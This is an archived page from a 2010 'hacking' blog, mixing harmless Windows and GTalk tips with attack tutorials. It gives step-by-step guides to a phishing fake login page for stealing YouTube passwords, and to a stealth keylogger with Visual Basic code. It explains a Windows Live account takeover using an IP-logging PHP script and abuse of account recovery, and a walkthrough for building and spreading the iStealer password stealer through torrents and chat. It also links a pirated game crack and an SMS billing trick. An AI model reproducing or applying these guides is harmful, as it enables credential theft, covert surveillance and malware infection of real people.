My site has been moved!

You should be automatically redirected in 6 seconds. If not, visit
http://www.hackagenius.co.cc
and update your bookmarks.




Hack Youtube Account-Phishing

Posted by smit sanghvi Sunday, January 17, 2010 0 comments



Learn how to hack a youtube account
Are you curious to “hack youtube accountt” well then this post is just for you,Most people ask me to tell us the easiest way to hack youtube,so here is the most easy way to hack you account i.e. phishing
Today we will focus on the easiest way i.e Fake login page
A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmailyoutube,friendster etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.


First of all download:Youtube fake login page

PROCEDURE:
1.once you have downloded youtube fake login page,now extract contents in a folder
2.In that ,find (CTRL+F) ‘http://hackingaday.com’ then change it to your destined URL but don’t forget ‘\’.
Save it .
3.Open Fake page in wordpad
4.Now press ctrl+F and search for the term “action=” now change its value to pass.php i.e. action=pass.php
5.Create an id in www.110mb.com , because i know about that site quite well.

6.Then upload the contents into a directory
7.For that,after creating an id you should go to file manager and upload all these files.
8.Then just got to youtube.htm and try out whether its working .
After you type in the file , a password file named pass.txt will be created in the same directory.Then you can see what username and password you have entered.

Google Talk Tips And tricks

Posted by smit sanghvi 0 comments



Most of us chat a lot everyday, with friends, family members and many other. If I don’t chat for a day with at least not even with one person, I say the day was boring! 
So here am I with some chat formatting tips & shortcuts that will help you to deal more efficiently with GTalk…
Text Formatting
  • Bold Text – Place the text between two asterisks. eg. *This text will be BOLD!*
  • Italic Text – Place the text between two underscores. eg. _This text will be ITALIC!_
GTalk Shortcuts
  • Esc – Close current chat window
  • Alt + Esc – Close all chat windows
  • F9 – Open Gmail
  • F11 – Call
  • F12 – End current Call
  • Tab – Switch through the currently open chat windows
Transliteration (Indic Languages)
Google Bots help you to transliterate English to some Indian Languages. Below is a list of bots, add them to your friend list and then send them any message and then they will respond you back with the transliterated message :)
Languages
Bots
English to Hindi en2hi.translit@bot.talk.google.com
English to Kannada en2kn.translit@bot.talk.google.com
English to Malayalam en2ml.translit@bot.talk.google.com
English to Tamil en2ta.translit@bot.talk.google.com
English to Telugu en2te.translit@bot.talk.google.com
GTalk Startup Parameters
There are some parameters that can be given to GTalk when it starts. It adds some extra functionality to GTalk.
To use the parameters, just edit the Google Talk shortcut on your desktop, and add any of the following parameters after a slash(/) or just run GTalk adding these parameters at the end followed by a slash(/).
  • nomutex – Open more than one instance of GTalk at a time
  • checkupdate – Check for updates to the current version
  • factoryreset – Load default settings
  • diag – Run GTalk in Diagnostic Mode
  • mailto user@gmail.com – Send an email using GMail
That’s all, I will keep adding new things as I find them 

Make Your Own keylogger

Posted by smit sanghvi 0 comments


This tutorial demonstrates how to make your keylogger easily…
Intro: What a Keylogger is made of
Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer. A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that ourkeylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.
=========================================
Basic Concepts: What needs to be achieved
=========================================
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.
Keylogger will:
1 – listen to all the key strokes of the user.
2 – save these keys in a log file.
3 – during logging, does not reveal its presence to the user.
4 – keeps doing its work as long as the used is logged on regardless of users actions.
==========================================
Implementation: Converting logic into code
==========================================
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!
We need a main form, which will act as HQ to the program.
First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:
Private Sub Form_Load()
Me.Visisble = False
End Sub
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden. Figure them out yourself, they have nothing to do with programming.
OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.
There are 3 methods to listen for keys:
* GetAsyncKeyState
* GetKeyboardState
* Windows Hooks
Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState().
So lets use this function, but where is that damn thing and how to use it?
Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer
This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState(). The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.
What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer. This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer. Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.
So the two possibilities are:
Do While 1=1
‘our use of the GAKS (GetAsyncKeyState) function Loop
and
Private Sub tmrTimer_Timer()
‘our use of the GAKS function
End Sub
Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is beingpressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed. And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style
If GAKS(65)<>0 Then
Msgbox “The ‘A’ key is being pressed”
Else
Msgbox “The ‘A’ key is not being pressed”
End If
Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.
Sticking all this stuff together, we can use this code to write a basic functional keylogger:
Private Sub tmrTimer_Timer()
Dim i As Integer
Static data As String
For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’
If GAKS(i)<>0 Then data = data & Chr(i)
Next i
If GAKS(32) <> 0 Then data = data & ” ” ‘checking for the space bar
If Len(data)>=100 Then
Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data
data = “”
End If
End Sub
This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a keypressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it. We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has beenpressed for a specified amount of time. For this, we need a whole array of counters. So open your eyes and listen attentively.
Dim count(0 to 255) As Integer
This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.
Private Sub tmrTimer_Timer()
Dim i As Integer
Const timelimit As Integer = 10
Static data As String
For i=0 To 255 ‘for all the ASCII codes
If GAKS(i)<>0 Then
If count(i) = 0 Then ‘if the key has just been pressed
data = data & Chr(i)
ElseIf count(i) < timelimit Then
count(i) = count(i) + 1 ‘add 1 to the key count
Else
count(i) = 0 ‘initialize the count
data = data & Chr(i)
End If
Else ‘if the key is not being pressed
count(i) = 0
End If
Next i
End Sub
What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is beingpressed, but it will wait for sometime before telling us again that the key is being pressed . This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.
Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:
Private Sub timrTimer_Timer()
‘do all the fuss and listen for keystrokes
‘if a key press is detected
Open App.Path & “\logfile.txt” For Append As #1
Print #1, Chr(keycode);
Close #1
End Sub
Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step. Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.

Manage Your Recycle Bin Options Better

Posted by smit sanghvi Monday, January 11, 2010 0 comments

BinManager is a very interesting application that allows better manage the Windows Recycle Bin.With this application you can delete files depending on the date on which they were eliminated, by deleting the files that were deleted today, yesterday, two days ago, and up to 30 days.


> Download Recycle Bin Manager : Link (61kb)
Once installed options are added to the context menu when right-click on any icon to the Trash. It is compatible with Windows XP, Vista and 7.

C++ in Windows 7 with DOSbox | Emulation

Posted by smit sanghvi Saturday, January 9, 2010 0 comments



Download Borland Turbo C++
Install the software DOSBox ver 0.72 ( 1.2 MB ) (Freeware) from the link below
(Direct Link)
Code:http://prdownloads.sourceforge.net/dosbox/DOSBox0.72-win32-installer.exe?download
Before going to the details u have to create a folder (any name will do). Here we
name it as Turbo
Copy the TC into the Turbo folder
Run the DOSBox 0.72 from the icon located on the desktop or from the location of
the installation folder
Then u are presented with two screens which look like the command prompt in
Windows
Now u are presented with two screens. One with a Z prompt. U can ignore the other
screen.
There type the following commands at the command prompt Person:
Mount [Type in any alphabet that u wish except z] [Type the source of the turbo C]
press enter
Now , Type in the following commands after the Z prompt:
Z: mount d c:\Turbo\ [The folder TC is present inside the folder Turbo]
* Now u should get a message which says: Drive D is mounted as a local directory
c:\Turbo\ ***
Now type d: to shift to d: prompt .
D: cd TC [The contents inside the folder Turbo gets mounted as a virtual drive
(Here D drive)
D: cd Bin
D: TC or Tc.exe [This presents u the Turbo C++3.0 screen]
On the Turbo C++ goto Options>Directories>Change the source of TC to the source
directory Drinks ( i.e. virtual D: refers to original c:\Turbo\ . So make the path
change to something like D:\TC\include and D:\TC\lib respectively )
===========================================================
In order to get the full screen use the key combination of Alt and Enter
When u exit from the DosBox [precisely when u unmount the virtual drive where
Turbo C++ 3.0 has been mounted] all the files u have saved or made changes in
Turbo C++ 3.0 will be copied into the source directory(The directory which
contains TC folder)
It is a good idea to backup your files in the source directory prior to running
DOSBox 0.72
For additional help go through the readme file located in the installation folder
or look on the website of the DOSBox forum.
The above procedure has been successfully implemented on Windows Vista Ultimate 64
bit & is operated in Windows 7 also perfectly ! Confused
IMP : Don’t use shortcut keys to perform operations in TC because they might be a
shortuct key for DOSBOX also . Eg : Ctrl+F9 will exit DOSBOX rather running the
code
Still have problems in working-out ???Comment Here

Visual Basic 6 with Windows 7

Posted by smit sanghvi 0 comments

Its a tug war, where the customers and Microsoft are playing around with the compatibility issues for the greatest software’s of all time. And as of now, they deny to support their own products. After surfing around the net, I’ve found very little information


regarding installation of VB6 on Windows 7. Most of the information out there is for Vista, and most of it is queries for assistance.
You may be wondering why someone would want to utilize VB6 on a shiny new operating system like Windows 7. Or even Vista for that matter.
There are about a bazillion legacy applications out there that have to be supported, and people like me who speak VB6 need to have the tools installed on our workstations in order to implement and test updates and such for these legacy applications.
It also helps out when I need to squirt out a quick tool for use in my daily work.
So without further delay, here is the process that I have used on my Windows 7 machines to install Visual Basic 6.
1. Turn off UAC.
2. Insert Visual Studio 6 CD.
3. Exit from the Autorun setup.
4. Browse to the root folder of the VS6 CD.
5. Right-click SETUP.EXE, select Run As Administrator.
6. On this and other Program Compatibility Assistant warnings, click Run Program.
7. Click Next.
8. Click “I accept agreement”, then Next.
9. Enter name and company information, click Next.
10. Select Custom Setup, click Next.
11. Click Continue, then Ok.
12. Setup will “think to itself” for about 2 minutes. Processing can be verified by starting Task Manager, and checking the CPU usage of ACMSETUP.EXE.
13. On the options list, select the following:
* Microsoft Visual Basic 6.0
* ActiveX
* Data Access
* Graphics
All other options should be unchecked. Click Continue, setup will continue.
14. Finally, a successful completion dialog will appear, at which click Ok. At this point, Visual Basic 6 is installed.
15. If you do not have the MSDN CD, clear the checkbox on the next dialog, and click next. You’ll be warned of the lack of MSDN, but just click Yes to accept.
16. Click Next to skip the installation of Installshield. This is a really old version you don’t want anyway.
17. Click Next again to skip the installation of BackOffice, VSS, and SNA Server. Not needed!
18. On the next dialog, clear the checkbox for “Register Now”, and click Finish.
The wizard will exit, and you’re done. You can find VB6 under Start, All Programs, Microsoft Visual Studio 6.
I’ve not tested this on Vista, but it should work for you there as well. Give it a try, and let me know how it works!
Enjoy!
UPDATE
You might notice after successfully installing VB6 on Windows 7 that working in the IDE is a bit, well, sluggish. For example, resizing objects on a form is a real pain.
After installing VB6, you’ll want to change the compatibility settings for the IDE executable.
1. Using Windows Explorer, browse the location where you installed VB6. By default, the path is C:\Program Files\Microsoft Visual Studio\VB98\
2. Right click the VB6.exe program file, and select properties from the context menu./li>
3. Click on the Compatibility tab./li>
4. Place a check in each of these checkboxes:
* Run this program in compatibility mode for Windows XP (Service Pack 3)/li>
* Disable Visual Themes/li>
* Disable Desktop Composition/li>
* Disable display scaling on high DPI settings
After changing these settings, fire up the IDE, and things should be back to normal, and the IDE is no longer sluggish.

Windows 7 GodMode

Posted by smit sanghvi 0 comments



Windows 7 is predominantly the best OS ever in the history of Microsoft. But, do you that it has a GodMode within it ?
Here is a hidden “GodMode” feature that lets users access all of the operating system’s control panels from within a single folder.
To enter “GodMode,” one need only create a new folder and then rename the folder to the following:
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
Just try it..:)
Found some more of Microsoft’s inbuilt godmode dev tools-
http://news.cnet.com/8301-13860_3-10426627-56.html
Append each of these after “FolderName.”
{00C6D95F-329C-409a-81D7-C46C66EA7F33}
{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}
{025A5937-A6BE-4686-A844-36FE4BEC8B6D}
{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}
{1206F5F1-0569-412C-8FEC-3204630DFB70}
{15eae92e-f17a-4431-9f28-805e482dafd4}
{17cd9488-1228-4b2f-88ce-4298e93e0966}
{1D2680C9-0E2A-469d-B787-065558BC7D43}
{1FA9085F-25A2-489B-85D4-86326EEDCD87}
{208D2C60-3AEA-1069-A2D7-08002B30309D}
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Example- SaThYa.{ash23-ifsdf..u know now!}
try these and have some fun. Mover, this is a kinda hack which you can make when you dislike that buzzing UAC !
Happy Hacking !



URL Shortening is a trend in today’s social media and web surfing. Big giants such as Google and YouTube have their own URL shorteners, too. It’s not just because the URL
shortening is a trend of the present, but also it’s important for tiny conversations like twitter or facebook status.
The trend, URL Shortening, was founded by Tinyurl.com at first and spread widely by twitter. Because you’re limited by how many characters you can use in your conversation, you need everything short but right. That’s why URL Shortening is important and popular at the same time.
Tinyurl.com has an option to preview the shortened link before you visit the site. If you include a word, preview, before the domain tinyurl.com, you will see where the link goes. But what about other shorteners?
Well, you can easily check the link before you have a go to any shortened URL by this firefox plugin. But sometimes you just don’t want to restart your firefox and want a quicker way to do this.
Here comes what exactly you need.
Sucuri has got a nice little web-based tool to let you see the destination of a shortened URL. Not only that, the tool will also check the destination URL in two different ways to find out if it’s safe for you to have a go to the site.



It’s advised to check the destination of a shortened link before you decide to have a visit.

Conclusion

I strongly recommend checking out the real URL behind a shortened one before you click on the link, even if one of your friends tweeted this. Twitter is often harmful for these kinds of shortened URLs that may cause damage to your PC or leave spyware program to your computer. As a result, checking the real URL is important for safe surfing. Also, for the sake of your computer’s safety, you need to make sure that the website you are about to visit is declared safe. Use the tool to know if it is.

How to Hack Windows Live Account

Posted by smit sanghvi Wednesday, January 6, 2010 0 comments




The information needed is:
     -Full name
     -Date of birth
     -Country
     -State
     -ZIP/Postal code
     -The IP address they last accessed their account with
     -Their Internet Service Provider
     -Last successful sign-in date



Well obviously some of that information is easier to obtain than others but it shouldn’t be too difficult to get most of it. E.g. Just asking somebody in which town they live in can reveal their country, state and postcode.
Obtaining the IP Address and Internet Service Provider
Most internet users are unaware and naïve to most computer networking terminology so getting them to just hand over their IP address would raise suspicions. The way I do it is with a simple PHP Script which logs their IP address and redirects to Meatspin.com. Sure, they might not be happy that they’re seeing a spinning cock on their screen, but it will most likely just lead them to believe you were just trying to prank them and will remain none the wiser.
Here is the code for the PHP script:
Code:
                header('Location:http://www.hackingaday.com');
$ip=$_SERVER['REMOTE_ADDR'];
$handle = fopen("iplog.txt", "a");
fwrite($handle, " $ip");
fclose($handle);
?>

Getting them to click the link shouldn’t be too hard, I’d imagine. Just link them to www.website.com/johndoe.php and they won’t be able to resist. Note that the log, in this instance will save to www.website.com/iplog.txt.
So now that you have their IP address their ISP is the next thing to get our hands on. Easiest thing to do is just do a Whois lookup on their IP address and get the ISP name from there.
Unless you ask them when they last signed in, getting their last sign-in date is entirely up to you. I usually wait for them to come online on Windows Live Messenger then go ahead with it as soon as they do so.
Okay now assuming you have all the information you need, head on over to this link:
Code:
https://support.live.com/eform.aspx?productKey=wlidvalidation&ct=eformcs

Obviously a proxy or a VPN is a good idea when doing this but I’ve never had any issues when going without one.
Once you’re their fill out all the appropriate information, specifically set ‘The e-mail address for us to send a response’ to an email address you already have access to and do the same with ‘Your alternate e-mail address’.
The other important thing you need to do when filling out the information is setting ‘The secret answer to your question’ to “I don’t remember” and it will be counted as a valid answer. Nice security they got going on, I know.
When entering the last successful sign-in, if they are currently signed in or have signed in today you can just type “Today” to eliminate any confusion
It’s best to leave the optional fields empty. We want to give them as little information as possible.
So go ahead and hit the Submit button and if you’ve done everything properly then you should come to a page with this:
Quote
Thank you for submitting your issue to Support.
Your Support Ticket Number: XXXXXXXXXXX
For reference, please print this page or write down your support ticket number. Use this number when communicating with Support about this issue.
To make sure that you can receive a reply from Microsoft, add the "microsoft.com" domain to your e-mail "safe list". If you do not receive a response in your "inbox" within 24 hours, check your "bulk mail" or "junk mail" folders.
Now assuming all the information you provided was accurate, in about 24 hours or so you should receive an email from Microsoft Customer Support that looks like this:
Quote
Hello emailid@live.com:
You recently asked to reset your Windows Live ID password by e-mail. Follow the instructions below to reset your password, or to cancel your password reset request.
TO RESET YOUR PASSWORD:
1. Select and copy the following Internet address.
[Link]
2. Open a browser, paste the link in the address bar, then press Enter or Return on your keyboard.
IF YOU DID NOT REQUEST TO RESET YOUR PASSWORD:
1. Select and copy the following Internet address.
[Link]
2. Open a browser, paste the link in the address bar, then press Enter or Return on your keyboard.
Thank you,
Windows Live ID Customer Support
NOTE:
Please do not reply to this message, which was sent from an unmonitored e-mail address. Mail sent to this address cannot be an
So just follow the link to reset the password and BAM you have their account.

iStealer Tutorial + Download

Posted by smit sanghvi 0 comments



This is tutorial for people which have no knowledge on configuring a iStealer server! If you have no knowledge on how to configure a iStealer server please read on!!
Also before we start we need to sign up for a free FTP service, I currently use
Code:
http://www.drivehq.com
so use that one, sign up and now lets start!
Step 1 ( Obtaining iStealer ):
Go to the following link:
*Note: This file was uploaded by me, it is safe, If you don’t believe me nor want to download it search for it on google. I have been using this for a while so I consider it safe.
Download Link:
Code:
http://www.mediafire.com/?ruiw5yummdd
This application WILL be detected by your anti-virus. Of course online scanners detect it as infected.. it’s a stealer you know..if you still believe this to be infected by me please do not download!
Step 2: (Extracting)
Right Click and extract “iStealer 3.0″
Once extracted there should be two files. One folder called “Icon Pack” and one application called “iStealer”.
Double Click on “iStealer”. There should now be a menu of options.
IF YOU GET ERROR MISSING COMDLG32.OCX
You can download the missing OCX here:
Code:
http://www.ocxdump.com/download-ocx-.../download.html
Once you’ve downloaded the missing OCX extract it into WINDOWS>SYSTEM32
Step 3: (Creating your password stealer server)
Okay once iStealer is up there should be a menu with different options.
Where it says host copy and paste this “ftp.drivehq.com” without quotes.
Where is says username enter your drivehq.com username.
Where is says password enter your drivehq.com password.
Okay Once they are all done you can decide whether you want to bind your server(password stealer)
with another application, song, document, picture etc! Just click “bind with another file” and choose what file you want
to bind your server with.
Once you have done that you can decide whether or not you want to change the icon. (If you skip this
step there will be just a default icon). Just click “Change icon then go to the folder where you extracted
iStealer, then open up icon pack then choose one of the icons there.
Once you have choosen your icon make sure ALL boxes are ticked in the “Recovery Options”.
Then go down to general settings and tick ” Anti virtualPC / VMWare ” (This will prevent the server from running on Virtual PC’s)
Once you have done that click ” Build ” and your done!
Step 4: Spreading/Infecting people with your server
This involves some skill, patience and well creativity.
If you want to infect a small amount of peope like a friend, ex-girlfriend etc. Just bind the server with a legitiment file some examples are: A document, song (Be Creative). Use “ShockLabs File Binder” to bind the two files together, then ZIP the server and send it via MSN Messenger.
Before we move on I’d suggest we make our server FUD meaning that the iStealer server is completely un-detected by all Anti-Virus engines this can be done by finidng a FUD Crypter, search around on the forums Im sure you will be able to find a free one. But you may have to invest a small amount of money on one if you cannot find any.
If you want to infect a majority of people I would suggest using torrents. Create a new torrent claim it to be some keygen, crack or whatever and seed! Upload your torrent to torrent sites like PirateBay and Mininova.
Also youtube is another method. Upload a fake video, and get people to download your server.


 
This is a new series of posts that I’ve started, which would deal with short tips to find what you need… This is a 2 step process to find the emai id of an Orkut User.
1. Go to the Orkut profile of the user you would like to find the email id of and click on “Ignore user” tab given on left side.
2. Open your Gtalk and click on settings link given on the top and click on blocked users. Now you would see the Email ID which was previously invisible to you.
ie. in short
Orkut profile>Ignore user>Gtalk settings>Blocked users>Email ID

Blogroll/Link Exchange

Posted by smit sanghvi 0 comments



Anyone Who Wants To Popularize There Website,Blog,Forum,etc.Can Link Exchange With Me.First add My Website HackingaGenius(http://www.hackingagenius.co.cc).To Your BlogRoll/Link Exchange.Then I will add yours.Comment Here For Link Exchange with your name,email,details about your Website,Blog or Forum

This Is The List Of  My BlogRoll


1.

HackTutors is a Blog to learn Tricks About Blogger,Adsense,Hacking and Other Useful Stuff.



2.
SnapHow is a Website All about Hacking



3.





4.





5.



6.



7.



8.



9.



10.

Download ‘Ghajini – The Game’ Free!

Posted by smit sanghvi Sunday, January 3, 2010 0 comments



Eros International, the leading studio in the Indian media and entertainment sector, joined forces with FXLabs Studios, the leading end-to-end game development company in India, to launch India’s first 3D PC Action Game based on a Bollywood movie. Developed on the action packed film Ghajini starring Aamir Khan, ‘Ghajini – The Game’ will be distributed by Eros International in both Indian and international markets.

‘Ghajini’ is a Third Person Action game, which will provide a fantastic opportunity to all Ghajini fans to experience the movie through this exciting game.

MINIMUM SYSTEM REQUIREMENTS :
Windows* XP SP2 with admin rights*
Intel* Pentium* 4 2.4 GHz+ or equivalent
1GB RAM
Intel* G965**, NVIDIA Geforce* 6600 or ATI Radeon* X800
With 256 MB Video Memory
1 GB Free Hard Drive Space
OpenAL / DirectX* 9.0c compliant Audio
RECOMMENDED SYSTEM REQUIREMENTS
Windows* XP SP2 with admin rights*
Intel* Core 2 Duo or equivalent
2 GB RAM
NVIDIA GeForce* 7600 or ATI Radeon* X1650
With 256 MB Video Memory
1 GB Free Hard Drive Space
OpenAL/DirectX* 9.0c compliant Audio
Compatible with Intel Integrated Graphics Chipset G965 and above
(may require additional RAM for Shared Video Memory)
Download Links :
Rapidshare Links :

http://rapidshare.com/files/202925984/Ghajini_Game.part1.rar
http://rapidshare.com/files/202940764/Ghajini_Game.part2.rar
http://rapidshare.com/files/202955530/Ghajini_Game.part3.rar
http://rapidshare.com/files/202970924/Ghajini_Game.part4.rar
http://rapidshare.com/files/202977976/Ghajini_Game.part5.rar
 
Download Crack : Click here
Download the  game and experiance the Aamir’s Life..lol…Hope you like this post!



By using this trick you can send unlimited SMS for free without a single paisa. This trick has tested successfully. In case of any problem , Just comment here, I will respond to your comments as soon as possible. Now be ready to Send Unlimited free SMSes to Your Friends.
Follow the Simple steps >>

  • Create a new message center :
    Message Center Name: ANY
    Message Center Number (MOST Important): +919810051905
    Now select preferred connection -> Packet Data
  • After creating a new message center, please manually select it from
    MESSAGE CENTER IN USE BOX.
  • Now Go to setting -> Phone Ssetting -> Connection -> Packet Data
  • Here change PACKET DATA CONNECTION -> when available
    and Access Point -> Airtel Live! ( Pls. Write as I have written here)
  • All setting has been DONE !!
Now for sending message. You have to write 0(zero) before any contact number. Pls don’t make mistake.
Note: Don’t Write 91….Instead of 91 write 0.. For example: if number is 9890098900 then you’ll write 09890098900. Enjoy.

Visit our new website

Our Newsletter

Enter your email address To Subscribe Us Via Email:

Our SMS Updates